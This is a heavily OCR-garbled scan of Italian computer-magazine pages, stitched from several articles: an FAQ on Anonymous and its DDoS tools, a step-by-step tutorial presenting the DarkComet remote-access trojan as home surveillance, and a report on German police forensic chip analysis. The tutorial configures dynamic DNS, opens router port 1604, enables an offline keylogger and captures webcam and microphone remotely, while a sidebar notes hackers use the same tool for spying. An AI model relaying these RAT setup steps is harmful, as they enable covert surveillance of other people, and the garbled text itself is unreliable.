Anonymous 


QUANTI MEMBRI 
HA ANONYMOUS? 

Anonymous non e una sorta di club: si parteci¬ 
pa direttamente Migliaia di persone sono coinvol 
te nelle azioni del gruppo e ciascuno decide da se 
a come vuol partecipare. Ufficialmente, non o so¬ 
no leader o gerarchie e questo rende molto diffici¬ 
le riconoscere se un’azione, un video o una lette 
ra siano effettivamente collegati con Anonymous 


fa con un mirato sovraccarico di un sito Web. Miglia¬ 
ia di computer inviano ad un sito tante richieste fino 
ad ottenere l’interruzione dei servizio. Anonymous 
di solito utilizza I applicazione LOIC che può essere 
usata da migliaia di persone, ma questa lasca tracce 
rivelatrici e gli attaccanti possono essere faci mente 
scovati La nuova arma di Anonymous, RefRel, può 
invece far crollare un sito Web sfruttando anche un 
solo computer e colui che utilizza questo strumento 
software praticamente non può essere rintracciato. 


I MEMBRI DI ANONYMOUS 
SONO STATI MAI ARRESTATI? 

Si. In Spagna, Regno Unito e USA sono stati arre¬ 
stati decine di sosteniton di Anonymous. In attacchi 
a siti Web sono stati registrati i loro indirizzi Inter¬ 
net (IP) e da qui il loro indirizzo reale. Attualmente 
è in corso un'intensa attività investigativa da par¬ 
te dell FBI e dell'Interpol sul gruppo hacker Lui/ 
Sec e sui presunti vertici di Anonymous Secondo 
gli investigatori dell'FBl, lo scorso anno e caduto 
nella loro rete “Sabu', uno dei top hacker di Ano¬ 
nymous. Accusato di cyber-attacchi contro gran¬ 
di imprese e istituzioni governative il ventottenne 
padre di famiglia si è pentito ed ha formio I identi¬ 
tà di diversi altri attivisti Anonymous, che sono sta¬ 
ti in seguito arrestati. 




COME SI INCONTRANO _ 

GLI ATTIVISTI ANONYMOUS? 

Soprattutto su Internet, com’è naturale Per man- 
:enere anonime le conversazioni, i membn parlano 
in IRC su uno spazio protetto: qui discutono e deci¬ 
dono nuove azioni Per inciso, anche se si dovesse¬ 
ro incontrare nella vita reale, gli utenti Anonymous 
si chiamerebbero solo con i loro nomi in codice 
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Il computer 
e microspia 


Webcam e scheda audio del PC 
possono essere usate per spiare 
casa a distanza. Ecco come 


Cosa ci ( 
occorre 


TOOL PER APRIRE 
PORTE PC 

SIMPLE PORT 
FORWARDING 

CO-HOM 

GMnmzm 

* aLACCESSO REMOTO 

OARKCOMET 
RAT LEGACY 

L CD-ROM 

ANWUKTOPER 
WEBCAM “ 

WEBCAM LOCK 

Le bevi sì CD-ROM 

SERVIZI 0 DI 00 NS 

NO-IP 

Sito Internet: 

www. no-ip-C0fn 


Q uando si parla di videosorveglianza, soli 
tamente siamo abituati a pensare subito 
a soluzioni complicate e costose che ri¬ 
chiedono un adeguato livello di preparazione 
per essere installate. Esistono però dei metodi 
semplici e alla portata di tutti per mettere in pie¬ 
di un efficiente sistema di videosorveglianzache 
consenta ditcnerc sotto control lo il PCquando 
cl allontaniamo dalla postazione o di servirci 
della sua webcam integrata per ispezionare 
casa quando siamo fuori per lavoro o vacanza. 

Il kit per il fai da te 

Per sviluppare il nostro progetto abbiamo deciso 
di tftilizzare DarkComet Lega^'v. un software che 
ci Jalapossibilità di controllare ogni compo¬ 
nente tisico del PC (webcam, hard disk, scheda 
audio.. .Tanche quando ci troviamo a chilometri 
di distanza. Grazie a queste sue caratteristiche 
poi remo accedere alla wchcnm e visualizzare 
le immagini riprese in tempo reale; potremo, 
altresì, attivare anche il microfono per catturare 
l'audio ambientale. Altra funzione interessanle 
del programma è il supporto di un keylogger 
integrato, che potrà servire per spiare tutto ciò 
che viene digitato sulla tastiera del PC in nostra 
assenza. E se volessimo accedere da remoto 
all'hard disk del PC per prelevare alcuni file? 
Niente paura: il software ci darà libero accesso 
a tutti i dati archiviati sul disco. Comodo, vero? 

Occhio ai malintenzionati 

l e potenzialità messe a disposizione dal sof¬ 
tware hanno sin dasuhito attirato l'interesse di 
alcuni pirati informatici, i quali hanno trasfor¬ 
mato il tool in un pericoloso strumento capace 
di penetrare nel PC della vittima oltrepassando 
qualsiasi proiezione: antivirus, firewall, ecc. 
Ma niente paura perché Win Magazine, come 
sempre, ha scovato il modo por tenere alla larga 
qualsiasi malintenzionato dal nostro computer 
(leggi box Così gli hacker ci sfhuno casa!}, 
















2 A controllare casa ci pensa il PC 

Possiamo sfruttare webcam e scheda audio del computer per creare un potente sistema di videosorveglianza 
a distanza. Ecco i passi da seguire per configurare tutto alla perfezione! 




* Il “portiere” del Computer 

2 Ora spostiamoci sul PC da controllare. 
. Installiamo Simpie Porr Forwardmg dal Web 
DVD sezione Internet Avviamo l'installazione e 
clicchiamo su Next tino a completare la procedu¬ 
ra con Finish. Ora non ci resta che configurare il 
a dovere. 


^ PC raggiungibile ovunque! 

"| . Creiamo un dominio gratuito su www.no- 
• • ■■■* ip.com per raggiungere il PC anche da 
remoto. Andiamo sul sito e clicchiamo Sign up 
now, inseriamo i nostri dati e scegliamo Sign up 
Annotiamo il nome scelto per il nostro dominio (atk 
esempio www.miodominio.no-ip.org). 


a La soia che viene dal PC 

4 È il momento di installare DarkComet RAT 
— Module, estraiamolo dal Win CD-Rom e 
avviamone l'installazione Accettiamo i termini di 
licenza e cucchiamo su Next. Procediamo ancora 
con /Vexffino ad avviare l'installazione; al termine 
clicchiamo Finish 


± Configuriamo il software 

g Avviamo il software, in iP/DNS inseriamo 
indirizzo del dominio appuntato al Passo 
1, in Port scriviamo 1604 e spuntiamo la casella 
vicino Actlve offline keylogger during this ses- 
sion. Clicchiamo Settings, spuntiamo ogni casella, 
scegliamo Fine! e, quindi, Active. 


^ Porte sem pre aperte 

3 : Avviamo Simple Port Forwarding, clicchia 
mo su File e quindi su Aggiungi porte gei 
aprire una porta di comunicazione sul router. Spo¬ 
stiamoci su Aggiungi personale, in Nome inse¬ 
riamo un identificativo a piacere, mentre in Porta 
Finale inseriamo 1604 e clicchiamo su Aggiungi 



j controllo da qui 

0 j| Ora dovremo spostarci sul PC dal qua 
le effettuare la videosorveglianza. Su 
quest'ultimo installeremo DarkComet RAT Legacy 
estraiamolo quindi dal Win CD-Rom accettiamo la 
licenza e clicchiamo su Next al termine scegliere¬ 
mo Installc , quindi, Finish 



Connessione stabilita 

7 ; Avviamo DarkComet e stabiliamo una con 
■*==-* nessione cuccando su DarkComet-RAT e 
scegliendo dal menu Listen to new port Un clic 
ancora su Listen per avviare la connessione al PC 
da controllare! A connessione stabilita apparirà una 
riga di notìfica come in figura. 



tw 4 


^ Alla ricerca di in form azioni 

g : Possiamo ad esempio, visualizzare molte 
mmJ caratteristiche del PC che abbiamo trasfor¬ 
mato m una stazione di videosorveglianza Per far¬ 
lo, facciamo doppio clic sulla riga che rappresenta 
il PC (chiamata Guest16), sulla colonna di sinistra 
clicchiamo System Info e poi Computer Info 



E se qualcuno utilizza 
g la tastiera del PC? 

Possiamo conoscere le parole digitate 
sfruttando il keylogger integrato in DarkComet 
Sempre dalla schermata di sinistra, clicchiamo su 
Spy tunctions. poi su Enable tutto ciò che verrà 
digitato apparirà per magia nella finestra! 
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Il computer come microspia | 


01 Teletrasporto in atto! 

Il nostro antifurto è pronto per essere messo alla prova. Attiviamo quindi webcam e scheda audio del computer 
per controllare casa anche a distanza. Ecco come fare. 




Diamo una sbirciatili 

alla webcam 


_ Vi 

Per attivare la visualizzazione d 


webcam, scegliamo dalla colonna di sinistra 
la sezione Spy Functions; dal menu a discesa 
che verrà apelo facciamo un doppio clic sulla 
voce Webcam Capture e attendiamo i apertu¬ 
ra della finestra dedicata alle impostazioni del¬ 
la webcam. 


Immagini in diretta 

dal nostro PC 

Si aprirà una nuova finestra dalla qua¬ 
le dimenio selezionare la periferica: citando 
su Start Captirre ivrerao il totale controllo del 
la webcam^La qua'ita delle mmagini ricevute 
risulta di default "bilanciala e ottimizzata’, cosi 
da non appesantire troppo la Pància $ltaiare 
rallentamenti. 


oantìaeriscf 
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ECCO COME GLI HACKER RIESCONO A SPI 

DarkComet f un tool legale che, come abbiamo visto, viene utilizzato come strumento di 
amministrazione remota. Purtroppo, c'è chi riesce a trasformarlo in un potente strumento 
spia. Alcuni pirati informatici, infatti, utilizzano DarkComet per creare trojan malevoli, 
capaci di prendere il pieno controllo del PC della vittima, con tutte le conseguenze 
del caso. Non solo riescono ad intrufolarsi nell'intero filesystem del Sistema attaccato, 
riuscendo a maneggiare qualsiasi tipo di file, ma arrivano a comandare a distanza web¬ 
cam e microfono integrato! Insomma, per quanto sia uno strumento utilissimo per fini 
completamente legali pud facilmente trasformarsi in un'arma pericolosa e inquietante. 

A volte, neanche l’antivirus installato sul PC riesce a segnalare I anomalia. Questo perché 
i pirati riescono a "blindare" il virus per renderlo irriconoscibile a qualsiasi strumento di 
difesa, inoltre, riescono a modificare il driver relativo alla webcam, impedendo che il led 

della stessa si accenda 
u na volta attivata. Cosa 
fare per scongiurare di 
essere spiati dal proprio 
PC? Noi di Win Magazi- 
ne consigliamo di utiliz¬ 
zare WebCamLock un 
software leggero che ci 
avviserà, tramite po- 
pup, ogni qual volta la 
nostra webcam entrerà 
in funzione. Un ottimo 
strumento per bloccare 
lespie. 


a webcam 

I Ck 


f 




^ Learn lo use thè program 


Change program conftguration 


Revtew webcam cepofi 




^ Perché accontentarsi 
3 solo delle immagini? 

w Se Qualcuno si trova nelle vicinanze dei PC 
videosorvegIiato, possiamo ascoltare le loro con¬ 
versazioni attivando il microfono. Selezioniamo con 
un doppio clic Sound Capture. lasciamo le impo 
stazioni di default e cicchiamo su Capture per 
avviare la registrazione. 


ASA NOSTRA! 
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in ifu trsiu uuinciu 

vedremo come gli 
investigatori indaga¬ 
no sulle tracce digita¬ 
li lasciate dai pirati 
informatici e quali 
sono i pericoli che 
attualmente minac¬ 
ciano la navigazione 
. in Internet. 


Bundes- 

kriiiimalaiTil 


Un cyber-criminale professionista lascia poche tracce della sua attività, 
ma gli esperti le trovano ugualmente. Diamo uno sguardo alla sede del 
BKA, la polizia tedesca specializzata anche in crimini informatici. 


L 


a sede della Polizia »5ni 
sede in un palazzo di té! 
mile a una foltezza, Qui i nostTf etfei 
(.murato i loto migliori specialisti in crimini 


dialisi forensi ha 
e vetro, si- 


Rigoroso controllo all’ingresso 

Prima di potere essere ammessi all’interno della cen¬ 
trale e attraversare il grande portale automarico in ac¬ 
ciaio , posizionato in mezzo a un doppio recinto provvi¬ 
sto di filo spinato e telecamere, il visitatore è sottopo¬ 
sto ad un’accurata ispezione, che prevede anche una 
schermografia digitale da puree delle autorità di poli¬ 
zia, per la quale l ospite avrà dovuto dare il proprio 
consenso alt uni giorni prima Nel corso di questo con¬ 
trollo si accerterà anche se sull’individuo pendono at¬ 
tualmente dei procedimenti giudiziari. Se questo 
check risulta negativo, dopo un minuzioso controllo 
del documento didenttcà, il visitatore può entrare in 
una sala d’attesa sorvegliata lai presenza di un conteni¬ 
tore per guanti in lattice usa e getta fa capire quanto 


siano approfonditi i controlli in questa sede. 

Dai “normali” criminali ai terroristi 

Prima che gli specialisti della Polizia Postale ci consen¬ 
so di utendere visione del loto lavoro quotidiano, pat¬ 
ri. ipr-jdBf i u ,j briefing sulla sicurezza. In breve, ci vie 
i#i|4*rn di spegnere e consegnare gli smartphone, di 
non ìpnacr i nomi dei collaboratori che effettuano 
indagini e ricche su casi concreti, di non scattare foto e 
di non pubblicizzare informazioni che facciano riferi¬ 
mento alla sezione investigazioni dell’edificio Alla fine 
ci si rende conto che esistono dei buoni motivi. Assieme 
agli investigatori della sezione crimini, gli analisti salva¬ 
guardano le tracce digitali di casi effettivamente sospet¬ 
ti. Questa attività include anche la caccia ai terroristi e le 
indagini su cyber-criminali, che agiscono in campo in¬ 
ternazionale, nonché la conservazione di prove di reati 
legati all’uso di sostanze stupefacenti, a tratte di esseri 
umani e ad efferati atti di violenza, come assassini! c omi¬ 
cidi volontari. 


Gli hacker della giustizia! 

A prima vista può sembrare banale, tua 
l'utilizzo di qualsiasi dispositivo elettro¬ 
nico lascia tracce digitali. Analizzare 
queste prove, talvolta determinanti, ri 
chiede una ricerca molto macchinosa. 1 
criminali ben organizzati creano proble¬ 
mi agli investigatori usando perfeziona¬ 
ti programmi per la cancellazione dei 
dati ed escogitando sistemi criptati hard 
e software, Gli specialisti della Polizia 
devono quindi inventarsi nuov i cruccili 
per aggirare i meccanismi di codifica e 


Un doppio recinto, protetto da filo spinato e sorvegliato da telecamere: In 
questa fortezza indagano gli esperti della sezione per I reati informatici. 


























ripristinare « dati cancellati. "Siamo purtroppo a corto di per 
sanale e nel corso di un anno, siamo in grado di occuparci so¬ 
lo di circa 100 chip" si rammarica il responsabile del servizio, 
dieci la da guida attraverso i “sacri luoghi "della centrale per 
i reati informatici. I suoi esperti sono molto orgogliosi della 
propria perizia tecnica: “Hacking fot Justice’ (Pirateria infor¬ 
matica al servizio della giustizia) è In slogan del tram degli 
analisti. 

Dissalda il chip e poi lo leggi 

Per recuperane i «lati dei mirmciraiiti degli smartphone è ne¬ 
cessario prima dissaldarli. Tutto questo costituisce un pro¬ 
blema, perché dalla metà del 2006, i produttori dei dispositi¬ 
vi, conformemente ad una direttiva UÈ, non devono più sal¬ 
dare i chip con il piombo. Da allora, ciò ha introdotto un pro¬ 
blema nella "temperatura” che deve essere impiegata per dis¬ 
saldare. dichiara un esperto della sezione tecnica. "Il nuovo 
materiale da utilizzare per la saldatura presenta un 
punto di fusione molto più elevato, e richiede quin¬ 
di una temperatura di saldatura maggiore, die au¬ 
menta il pericolo di danneggiare i chip. Con i chip 
che tendonoa fondersi, vanno in fumo anche le pr<>- 
ve. Al fine di limitare il più possibile questi danni 
trilaterali, gii specialisti ripongono le proprie spe- 
^su un'apparecchiatura realizzata ad hoc, tra¬ 
mite la qiiaie^rovvedono a saldare i chip dei dispo¬ 
sitivi esaTnmrnW aMli temperatura del punto di fu¬ 
sione, e all tSft^tftza pqgpno anche essere trattati 
con la fresai vedi foto in questa pagina, a sinistra). 


Ora le mani non devono tremare: un miao 
circuito fresato prelevato da uno smartpho¬ 
ne, viene inserito nel dispositivo di lettura 


Know-how molto accurato 

Per prima cosa, grazie ad un dispositivo | 
tura, ideato all'interno del laboratorio, si ] 
analizzare i componenti elettronici della i 
Tramite un software specifico vengono esaminati 
gli schemi elettronici del chip, che riconducono ai 
dati. In questo modo, gli specialisti vengono a co¬ 
noscenza anche dello schema dei micro-controller, 
non riportati nel datasheee. "Questo è quanto si ve¬ 
rifica enn numerosi processori di provenienza 
asiatica” ri ha riferito uno dei tecnici. Se si trami 
di un chip standard presente sul mercato, gli 


esperti sono in grado di leggerne i dati con le "normali attrez¬ 
zature da liackex, reperibili anche tramite Internet”. Sferrando 
degli attacchi "Bruce-Force”. è passibile, in poche frazioni di 
secondo, provare automaticamente migliaia di torti binazioni 
di parole, che consentono di scoprile le |*assword. 

Password sotto tensione 

Nei casi più complicati è necessario ricorrere ad un oscillnsco- 


Attraverso un lettore di schede, realizzato ad hoc nel laboratorio, 
gli esperti riescono ad analizzare qualsiasi tipo di chip. 


Kuagfei^ 

i procedi ad 

a memonlr 


Il software è sviluppalo Internamente e si utilizza per rintracciare i 
conduttori di un chip che si occupano del trasferimento dei dati. 


Gli specialisti analizzano chip provenienti da smartphone, na¬ 
vigatori GPS e lettori di schede a banda magnetica. 
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□ I condirttori.saldati.con un apparecchio speciale, 
sono cento volte più sottili di un capello.. 


Attraverso un microscopio elettronico a scansione lineare, è possibile stabilire con esat- I nuovi conduttori sono in grado di aggirare I campi 
tezza dove sono posizionati i settori criptati di un microcircuito. di criptatura presenti sul chip. ♦ 











































TROJAN VIA TELEFONO 

Fate attenzione alle telefonate di 
sedicenti ditte di manutenzione, 
che vogliono convincervi ad instal¬ 
lare un software pei un servizio di 
assistenza a distanza. I truffatori 
potrebbero installarvi dei troiani 

SPIATI CON INTERNET 
EXPLORER 

A seguito di una falla che si è aoer 
a dal mese di Ottobre in Internet 
Explorer, i pirati sono in grado di 
spiare e seguire le tracce dei movi¬ 
menti del vostro mouse, non solo 
nel browser ma anche sul desktop. 

APP PER WINDOWS 8 

A causa di difettosi meccanismi di 
cnptatuia, numerose App Metro per 
iVindows 8 soncynolto semplici da 
forzare per gli hacker. 

sm WEB POCO SOCIALI 

Servizi di tracking come LeadLan 
é ier sono in grado di Identificare i vi 
' -.itateli di una pagina Internet, sulla 
oase dei Sistemi Informativi Territo¬ 
riali e di rilevamenti da parte di reti 
sociali come linkedln. 

ANDROID POCO SICURO 

Jelly Bean (Ueis. 4.2), il nuovo sistema 
operativo AixJiwd di Google, è dotato di 
jno scanner per i virus. In un test effet¬ 
tuato daK'univeisità della Notti' Carolina 

10 scanner ha peto «conosciuto soltanto 

11 15% delle App infette da virus. 


pio Tramite questo apparecchio, che mi sura la tensione 
elettrica, è possibile determinare il comportamento del 
chip, nel moriremo in cui viene immessa una password, 
poiché il consumo di corrente dei microcircuito teude 
ad aumentare, immettendo un componente corretto 
della password. A differenza di quanto avviene con l'im¬ 
missione di una password erraca, il chip comincia così il 
suo lavoro di calcolo che richiede corrente, che, anche se 
minima, può essere riusurata. In questo modo, è possi¬ 
bile leggere lentamente ma in modo sicuro, la password 
corretta. 

Raggi UV e nano-saldatrìce 

Le indagini contro le organizzazioni criminali specia¬ 
lizzate nei lettoci magnetici sono decisamente più im¬ 
pegnative, poiché i pirati che sottraggono i dati dalle 
carte di credito mediante congegni da applicare ai 
Bancomat ferino pane di organizzazioni di prim ordi¬ 
ne. Nella maggior parte dei casi vengono catturaci i pe¬ 
sci piccoli, vale a dire la "manovalanza' che si occupa di 
applicare- questi dispositivi fraudolenti ai Bancomat c 
del loro successivo smontaggio. “Affinché questi ma¬ 
novali non siruuino loro stessi i dati per operazioni il¬ 
legali, i capi di quesce organizzazioni captano l'har- 
j^ttiredei loro dispositivi' Gli esperti della Polizia de- 
oHriaÈKjucsra criptatura. utilizzando un laser. Artraver- 
sii un mrcnor; copio elettronico a scansione lineare, loca¬ 
lizzano i settori criptaci del chip, che si sbloccano poi 
con una tnini-f .su. Successi vamente il settore di chip 
('lode bit”) viene c.u%J]ato con li ricuce ultravioletta, 
ottenendo così la decifrati .«dei cjm. Nel peggiore dei 
casi, gli specialisti ricorrono al FIB .foaisedjoniaeam 
System). Mediante un fascio di ioni, i ir enici escludono 
la pane di chip die si occupo della cifraturaOT>g#ve-«si 
dendo a saldare dei nuovi conduttori attorno 
Questo apparecchio, di cui in F.urop.i ci sono solo due 
esemplari, è in grado di saldare conduttori cento volte 
più sottili di un capello. In tal modo il chip mostrerà 
immediatamente le informazioni in esso contenute. 
Gli esperti del BKA non ci hanno permesso di appro¬ 
fondire le loro metodologie, ma chissà, forse in un altra 
visitaci faranno vedere di più,.. 


In questa postazione di lavoro, gii specialisti provvedono a sai 
dare e fresare i chip di smartphone, navigatori e altri dispositivi. 


Quale itinerario e stato percorso con un veicolo sospetto? Il 
chip del navigatore ce lo svela. 

4 I dall dei lettori 
di bande magneti 
che, attraverso i qua¬ 
li I truffatori manipo¬ 
lano i Bancomat, so¬ 
no sempre captati. 
Soltanto facendo ri¬ 
corso a tecniche 
speciali, è possibile 
fare venire alla luce 
questi dati, aggira n 
do e disattivando 
elettronicamente i 
settori criptati di un 
chip. I dati potranno 
successivamente es¬ 
sere letti e memoriz 
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